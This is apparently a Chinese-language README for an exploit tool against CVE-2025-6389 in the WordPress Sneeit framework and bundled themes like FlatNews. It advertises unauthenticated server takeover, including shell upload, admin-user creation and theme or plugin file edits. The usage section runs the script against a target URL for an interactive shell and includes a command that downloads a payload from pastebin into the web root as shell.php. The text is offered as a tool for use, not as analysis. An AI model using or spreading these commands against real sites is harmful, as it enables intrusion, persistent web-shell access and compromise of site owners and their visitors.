说明:
- 🔓无需登录
- 💥服务器可能被完全接管
- 📤 攻击者可以上传 shell、添加管理员用户或修改主题/插件文件
- 🧬 已在野外被积极开发利用
简单说明:
- 🎯 影响任何使用 Sneeit 框架或与其捆绑的主题(例如FlatNews)的 WordPress 网站
- 只要使用的是WordPress的sneeit框架都会存在此漏洞.
用法
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
